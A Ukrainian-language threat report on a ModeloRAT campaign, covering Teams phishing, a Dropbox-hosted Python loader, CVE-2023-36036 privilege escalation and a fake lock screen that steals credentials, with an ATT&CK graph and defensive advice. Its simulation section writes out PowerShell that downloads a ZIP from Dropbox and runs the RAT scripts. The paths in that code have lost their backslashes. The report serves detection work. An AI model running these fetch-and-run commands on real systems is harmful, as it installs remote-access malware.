Аналіз кампанії ModeloRAT: від фішингу в Teams до компрометації домену

SOC Prime Team

Стежити

Аналіз кампанії ModeloRAT: від фішингу в Teams до компрометації домену

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Rapid7 проаналізувала вторгнення, яке почалося зі зловмисного повідомлення Microsoft Teams, яке маскувалося під підтримку ІТ. Зловмисник використав завантажений на Dropbox Python-завантажувальний файл для впровадження ModeloRAT, підвищив привілеї через CVE-2023-36036, і викрав облікові дані домену, представляючи жертві підроблений екран блокування. Кампанія показала, як швидко зловмисник може перейти від одного компрометованого кінцевого пристрою до ширшого викрадення облікових даних по всьому домену, покладаючись на методи живлення на місці. Інцидент також підкреслює зростаючий ризик, який представляють платформи для співпраці як вектор початкового доступу.

Дослідження

Розслідування слідувало повного ланцюга атаки від початкової розмови в Teams до PowerShell-завантажувача, який завантажував ZIP-архів з Dropbox, розпаковував переносне середовище Python і запуск collector.py and Pmanager.py. Потім ModeloRAT встановив HTTP-оповіщення до кількох серверів командування і контролю, провів розвідувальну діяльність на хості та викорис rundll32 , щоб викликати експлойт ядра, що надає доступ на рівні SYSTEM. Постійність підтримувалася через заплановане завдання, а під час вторгнення зловмисники розгорнули додаткові компоненти бекдору.

Пом’якшення

Організації повинні застосовувати суворий контроль за зовнішнім доступом в Microsoft Teams, контролювати нетипову активність PowerShell і Python, блокувати відомі зловмисні URL-адреси Dropbox та забезпечувати виправлення систем від CVE-2023-36036. Політики контролю додатків, які обмежують неавторизоване rundll32 використання можуть допомогти зменшити ризик експлуатації. Команди безпеки також повинні стежити за поведінкою підробленого екрану блокування та іншими ознаками активності викрадення облікових даних на кінцевих пристроях.

Відповідь

Якщо ця активність виявлена, негайно ізолюйте уражену кінцеву точку, відкличте скомпрометовані облікові дані користувача та скиньте паролі домену, які зазнали впливу. Розслідувачі повинні зібрати повні знімки пам’яті, включаючи докази, пов’язані з LSASS, де це доречно, полювати на артефакти ModeloRAT і видаляти будь-які зловмисні заплановані завдання або механізми збереження постійності. Параметри орендаря Teams також слід переглянути, а зовнішній чат слід вимкнути, якщо він не є оперативно необхідним.

"graph TB %% Опис класи classDef action fill:#ffcccc classDef tool fill:#cce5ff classDef malware fill:#e6ffcc classDef process fill:#ffd9b3 classDef file fill:#f2e6ff %% Вузли дій action_phishing["Дія – T1566.003 Фішинг: Spearphishing через сервіс Повідомлення Microsoft Teams, що видає себе за підтримку ІТ, з шкідливим посиланням."] class action_phishing action action_impersonation["Дія – T1656 Видавання Підроблений акаунт підтримки ІТ, створений, щоб здаватися законними."] class action_impersonation action action_content_injection["Дія – T1659 Впровадження контенту Повідомлення містить команду PowerShell, що запускає інфекційний ланцюг."] class action_content_injection action action_user_execution["Дія – T1204 Виконання користувача Жертва натискає на посилання або копіює-ставляє PowerShell-завантажувач."] class action_user_execution action action_software_discovery["Дія – T1518 Виявлення програмного забезпечення collector.py перераховує встановлене програмне забезпечення, патчі та конфігурацію."] class action_software_discovery action action_security_discovery["Дія – T1518.001 Виявлення програмного забезпечення для безпеки Скрипт перевіряє процеси антивірусів, такі як SecurityHealthHost.exe."] class action_security_discovery action action_system_info["Дія – T1082 Виявлення інформації про систему systeminfo, whoami та інші команди збирають інформацію про хост."] class action_system_info action action_dll_loading["Дія – T1176 Підключення програмного розширення rundll32.exe завантажує зловмисні DLL (ssss.dll, com6848.dll)."] class action_dll_loading action action_priv_esc["Дія – T1068 Експлуатація для підвищення привілеїв Експлойт CVEu20112023u201136036 у cldflt.sys отримує системний токен."] class action_priv_esc action action_defense_evasion["Дія – T1211 Експлуатація для обходу захисту Експлойт ядра обходить засоби безпеки."] class action_defense_evasion action action_persistence_active_setup["Дія – T1547.014 Активне налаштування постійності Ключі реєстру під SyncRootManager реєструють зловмисного провайдера синхронізації хмари."] class action_persistence_active_setup action action_event_triggered["Дія – T1546 Виконання за тригером події Провайдер синхронізації виступає як механізм постійності за тригером події."] class action_event_triggered action action_scheduled_task["Дія – T1053 Заплановане завдання Щоденне завдання TempLogA запускає internal.py із системними привілеями."] class action_scheduled_task action action_path_interception["Дія – T1574.007 Перехоплення шляху Директорія переносного Python розміщується на початку PATH для забезпечення виконання."] class action_path_interception action action_c2_http["Дія – T1071.001 Протокол прикладного шару: Інтернет-протоколи ModeloRAT зв’язується з серверами командування і контролю через HTTP-порт 80."] class action_c2_http action action_nonstandard_port["Дія – T1571 Незазначений порт Додаткові канали зворотної оболонки використовують порти 50508 і 60503."] class action_nonstandard_port action action_winrm["Дія – T1563 Викрадення сесії віддаленого сервісу Зловмисник відкриває сесію WinRM на другий хост для розгортання інструменту."] class action_winrm action action_rdp["Дія – T1078.002 Дійсні облікові записи: Облікові записи домену Викрадені облікові дані використовуються для входу через RDP."] class action_rdp action action_kerberoasting["Дія – T1558.003 Kerberoasting Запити на отримання сервісного квитка генерують хеші облікових даних."] class action_kerberoasting action action_os_credential_dump["Дія – T1003 Зняття облікових даних ОС DumpIt.exe захоплює пам’ять, включаючи LSASS."] class action_os_credential_dump action action_unsecured_credentials["Дія – T1552.001 Незахищені облікові дані DLL підробленого екрану блокування записує захоплені паролі на диск."] class action_unsecured_credentials action action_window_discovery["Дія – T1010 Виявлення вікон додатку Репліка екрану блокування копіює екран блокування Windows для захоплення вводу."] class action_window_discovery action action_bits_job["Дія – T1197 Завдання BITS DumpIt завантажується і виконується через BITS."] class action_bits_job action %% Вузли інструментів / файлів / зловмисного ПЗ tool_powershell["Інструмент – Назва: PowerShell Опис: Виконує початкову команду завантажувача."] class tool_powershell tool tool_python["Інструмент – Назва: Переносний Python (pythonw.exe) Опис: Запускає collector.py та Pmanager.py."] class tool_python tool tool_rundll32["Інструмент – Назва: rundll32.exe Опис: Завантажує зловмисні DLL."] class tool_rundll32 tool tool_dumpit["Інструмент – Назва: DumpIt.exe Опис: Утиліта для захоплення пам’яті."] class tool_dumpit tool malware_collector["Зловмисне ПЗ – Назва: collector.py Опис: Початковий скрипт Python, що виконує розвідку та запускає подальші модулі."] class malware_collector malware malware_pmanager["Зловмисне ПЗ – Назва: Pmanager.py (ModeloRAT) Опис: Троян віддаленого доступу, що зв’язується з C2."] class malware_pmanager malware file_ssss_dll["Файл – Назва: ssss.dll Опис: Зловмисна DLL, завантажена для підвищення привілегій."] class file_ssss_dll file file_com6848_dll["Файл – Назва: com6848.dll Опис: Зловмисна DLL, завантажена для збору облікових даних."] class file_com6848_dll file file_lockdll["Файл – Назва: lockscreen.dll Опис: Підроблений екран блокування, що записує паролі."] class file_lockdll file %% Зв’язки курсом атаки action_phishing –>|використовує| action_impersonation action_impersonation –>|доставляє| action_content_injection action_content_injection –>|запускає| action_user_execution action_user_execution –>|виконує| tool_powershell tool_powershell –>|запускає| tool_python tool_python –>|запускає| malware_collector tool_python –>|запускає| malware_pmanager malware_collector –>|виконує| action_software_discovery malware_collector –>|виконує| action_security_discovery malware_collector –>|виконує| action_system_info malware_pmanager –>|завантажує| tool_rundll32 tool_rundll32 –>|завантажує| file_ssss_dll tool_rundll32 –>|завантажує| file_com6848_dll file_ssss_dll –>|включає| action_priv_esc file_com6848_dll –>|включає| action_priv_esc action_priv_esc –>|забезпечує| action_defense_evasion action_defense_evasion –>|встановлює| action_persistence_active_setup action_persistence_active_setup –>|створює| action_event_triggered action_event_triggered –>|створює| action_scheduled_task action_scheduled_task –>|залежить від| action_path_interception action_path_interception –>|забезпечує виконання| malware_pmanager malware_pmanager –>|комунікує через| action_c2_http malware_pmanager –>|використовує| action_nonstandard_port malware_pmanager –>|відкриває| action_winrm action_winrm –>|сприяє| action_rdp action_rdp –>|використовує| action_kerberoasting action_kerberoasting –>|надає облікові дані для| action_os_credential_dump action_os_credential_dump –>|виконує| tool_dumpit tool_dumpit –>|доставлено через| action_bits_job action_bits_job –>|підтримує| action_os_credential_dump action_unsecured_credentials –>|впроваджено за допомогою| file_lockdll file_lockdll –>|захоплює через| action_window_discovery action_window_discovery –>|пише на| action_unsecured_credentials %% Стилізація class action_phishing,action_impersonation,action_content_injection,action_user_execution,action_software_discovery,action_security_discovery,action_system_info,action_dll_loading,action_priv_esc,action_defense_evasion,action_persistence_active_setup,action_event_triggered,action_scheduled_task,action_path_interception,action_c2_http,action_nonstandard_port,action_winrm,action_rdp,action_kerberoasting,action_os_credential_dump,action_unsecured_credentials,action_window_discovery,action_bits_job action class tool_powershell,tool_python,tool_rundll32,tool_dumpit tool class malware_collector,malware_pmanager malware class file_ssss_dll,file_com6848_dll,file_lockdll file "

Курс атаки

Опис атаки та команди:
1. Початкове скидання: Отримавши точку доступу до робочої станції жертви, зловмисник запускає PowerShell для отримання шкідливого ZIP-файлу, розміщеного на Dropbox. URL-адреса жорстко закодована в правилі виявлення, тому зловмисник використовує ту ж саму строку, щоб гарантувати виявлення (для цілей валідації).
2. Розпакування: Використовуючи вбудовану команду Expand-Archive , архів розпаковується безпосередньо у папку користувача %APPDATA% , місце, яке часто ігнорують захисники.
3. Виконання ПЗЛ: Два скрипти Python—collector.py and Pmanager.py—виконуються за допомогою pythonw.exe («інтерпретатор без вікон»), щоб уникнути видимих консолей, забезпечуючи непомітну постійність і ексфільтрацію даних.
Точні команди (повинні відповідати правилу):
```
# 1. Завантажте ZIP-архів
iwr -Uri "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:APPDATAWinp.zip"

# 2. Розпакуйте архів
Expand-Archive -Path "$env:APPDATAWinp.zip" -DestinationPath "$env:APPDATA"

# 3. Виконайте перший Python-скрипт
Start-Process "$env:APPDATAWPy64-31401pythonpythonw.exe" -ArgumentList "$env:APPDATAWPy64-31401pythoncollector.py"

# 4. Виконайте другий Python-скрипт
Start-Process "$env:APPDATAWPy64-31401pythonpythonw.exe" -ArgumentList "$env:APPDATAWPy64-31401pythonPmanager.py"
```

Скрипт регресійного тестування:

# -------------------------------------------------
# Тест регресії – Імітація роботи ModeloRAT PowerShell
# -------------------------------------------------
$zipUrl = "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1"
$zipPath = "$env:APPDATAWinp.zip"
$extractPath = $env:APPDATA
$pythonExe = "$env:APPDATAWPy64-31401pythonpythonw.exe"
$collector = "$env:APPDATAWPy64-31401pythoncollector.py"
$pmanager = "$env:APPDATAWPy64-31401pythonPmanager.py"

# Завантажте
Write-Host "[*] Завантаження зловмисного ZIP-файлу..."
Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath

# Розпакуйте
Write-Host "[*] Розпакування архіву..."
Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force

# Виконання collector.py
Write-Host "[*] Запуск collector.py..."
Start-Process -FilePath $pythonExe -ArgumentList $collector

# Виконання Pmanager.py
Write-Host "[*] Запуск Pmanager.py..."
Start-Process -FilePath $pythonExe -ArgumentList $pmanager

Write-Host "[+] Симуляція завершена. Перевірте SIEM для створення попереджень."

Команди очищення:

# -------------------------------------------------
# Очищення – Видалення артефактів, створених під час тесту
# -------------------------------------------------
$zipPath = "$env:APPDATAWinp.zip"
$extractRoot = "$env:APPDATAWPy64-31401"
$pythonExe = "$env:APPDATAWPy64-31401pythonpythonw.exe"

# Зупиніть будь-які процеси pythonw, що запущені в результаті цього тесту
Get-Process -Name pythonw -ErrorAction SilentlyContinue |
    Where-Object {$_.Path -like "*WPy64-31401*"} |
    Stop-Process -Force

# Видаліть розпаковану директорію
if (Test-Path $extractRoot) {
    Remove-Item -Recurse -Force $extractRoot
}

# Видаліть ZIP-файл
if (Test-Path $zipPath) {
    Remove-Item -Force $zipPath
}

Write-Host "[+] Очищення завершено."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно